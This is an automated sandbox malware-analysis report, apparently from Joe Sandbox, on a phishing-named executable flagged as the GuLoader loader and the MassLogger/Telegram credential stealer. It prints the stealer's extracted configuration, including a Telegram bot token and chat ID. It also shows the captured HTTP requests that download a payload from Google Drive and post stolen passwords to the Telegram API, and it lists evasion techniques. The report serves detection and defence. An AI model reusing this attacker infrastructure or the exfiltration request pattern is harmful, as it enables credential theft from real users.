Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IBAN payment confirmation.exe

Overview

General Information

Sample name:IBAN payment confirmation.exe
Analysis ID:1567427
MD5:b134b557b86a160168de0c56ba982ea6
SHA1:7c6e7f286bc9de5bd66a5cf4713d7938e78ab3ae
SHA256:5b67270f1f8cfdbb96cfa359f9d9caa35fcfa9538ef8a3b27fff7b7001c3584c
Tags:exeuser-abuse_ch
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.1943129976.0000000005351000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: IBAN payment confirmation.exe PID: 3824JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:20:36.970827+010020577441Malware Command and Control Activity Detected192.168.2.749903149.154.167.220443TCP
            2024-12-03T15:20:40.631481+010020577441Malware Command and Control Activity Detected192.168.2.749913149.154.167.220443TCP
            2024-12-03T15:20:45.275440+010020577441Malware Command and Control Activity Detected192.168.2.749926149.154.167.220443TCP
            2024-12-03T15:20:48.795846+010020577441Malware Command and Control Activity Detected192.168.2.749935149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:20:26.610765+010028032742Potentially Bad Traffic192.168.2.749862132.226.247.7380TCP
            2024-12-03T15:20:34.829536+010028032742Potentially Bad Traffic192.168.2.749862132.226.247.7380TCP
            2024-12-03T15:20:38.657701+010028032742Potentially Bad Traffic192.168.2.749909132.226.247.7380TCP
            2024-12-03T15:20:43.220296+010028032742Potentially Bad Traffic192.168.2.749919132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-03T15:20:11.187457+010028032702Potentially Bad Traffic192.168.2.749841172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: IBAN payment confirmation.exeAvira: detected
            Source: 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s", "Telegram Chatid": "2065242915"}
            Source: IBAN payment confirmation.exe.3824.11.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendMessage"}
            Source: IBAN payment confirmation.exeReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983B4C0 CryptUnprotectData,11_2_3983B4C0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_3983BCB8 CryptUnprotectData,11_2_3983BCB8
            Source: IBAN payment confirmation.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49886 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.7:49841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.7:49850 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49903 version: TLS 1.2
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00402770 FindFirstFileW,11_2_00402770
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,11_2_00405772
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 11_2_0040622D FindFirstFileW,FindClose,11_2_0040622D
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 0011E959h11_2_0011E6A8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 0011F082h11_2_0011EC58
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 0011F082h11_2_0011EFAF
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983AC65h11_2_3983A928
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983C8D0h11_2_3983C628
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983F248h11_2_3983EFA0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39839A71h11_2_398397C8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983C478h11_2_3983C1D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983F6A0h11_2_3983F3F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983D5D8h11_2_3983D330
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983EDF0h11_2_3983EB48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39839619h11_2_39839370
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983C020h11_2_3983BD78
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983CD28h11_2_3983CA80
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983A779h11_2_3983A4D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983D180h11_2_3983CED8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983E998h11_2_3983E6F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39839EC9h11_2_39839C20
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983FAF8h11_2_3983F850
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 3983A321h11_2_3983A078
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then push 00000000h11_2_39C998D0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C9630Dh11_2_39C96130
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C96C97h11_2_39C96130
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C93C98h11_2_39C939F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C90B98h11_2_39C908F0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C92B38h11_2_39C92890
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C94DF8h11_2_39C94B50
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C91CF8h11_2_39C91A50
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C90FF0h11_2_39C90D48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C92F90h11_2_39C92CE8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C95250h11_2_39C94FA8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C92150h11_2_39C91EA8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C940F0h11_2_39C93E48
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C91448h11_2_39C911A0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C933E8h11_2_39C93140
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C902E8h11_2_39C90040
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C925AAh11_2_39C92300
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C94548h11_2_39C942A0
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C918A0h11_2_39C915F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C93840h11_2_39C93598
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C90740h11_2_39C90498
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]11_2_39C9A6C7
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then jmp 39C949A0h11_2_39C946F8
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_39C9563C
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then push 00000000h11_2_3A20E710
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then push 00000000h11_2_3A20F25E
            Source: C:\Users\user\Desktop\IBAN payment confirmation.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_3A20F520

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49903 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49913 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49935 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49926 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1387340d4cc4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13b68e35914eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd13f0a3b04275Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd141c978a7e02Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.67.152 104.21.67.152
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49862 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49919 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49909 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49841 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49886 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1387340d4cc4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006ABE000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: IBAN payment confirmation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000037141000.00000004.00000800.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.000000003705A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7766574905:AAHqEKY-434lRHaHTq5dzX-5SzIzpyCwC4s/sendDocument?chat_id=2065
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.00000000069F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/4
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.00000000069F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/d
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509913511.0000000008470000.00000004.00001000.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh.
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2179357888.0000000006A60000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2179458705.0000000006A65000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2146619589.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2509476832.0000000006A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1GgMJKZPxz_ZGljJ3SvY2kRtxfuU0niSh&export=download3
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.228
            Source: IBAN payment confirmation.exe, 0000000B.00000002.2529825283.0000000036FB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.orgP
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2127970360.0000000006A66000.00000004.00000020.00020000.00000000.sdmp, IBAN payment confirmation.exe, 0000000B.00000003.2128063923.0000000006A66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
